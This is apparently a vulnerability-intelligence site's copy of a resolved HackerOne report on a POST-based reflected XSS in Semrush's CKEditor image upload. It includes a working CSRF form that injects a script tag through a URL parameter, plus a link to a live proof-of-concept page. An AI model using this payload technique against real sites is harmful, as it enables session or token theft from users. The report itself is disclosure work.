Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Post Based XSS On Upload Via CK Editor [semrush.com]

Low
S
Semrush
Submitted None
Actions:
View on HackerOne
Reported by apapedulimu

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
**Summary:** XSS Via Post Method When Upload via CKEditor **Description:** This XSS is execute by error message when upload some image on ``` https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=0&langCode=en ``` ## Browsers Verified In: * Firefox ## Steps To Reproduce: - This is POST based XSS, need some csrf to trigger the xss - Create .html code like : ``` <html> <body> <form action="https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=dadasd</script><script>alert(document.domain)</script>&langCode=en" method="POST"> <input type="submit" value="Submit request" /> </form> </body> </html> ``` - and click the submit request - Or go to http://labs.apapedulimu.click/xss-semrush.html ## Supporting Material/References: {F314582} ## Impact XSS Will be execute it when user click that button, and attacker can stole user token, IP & etc. Regards, Apapedulimu

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected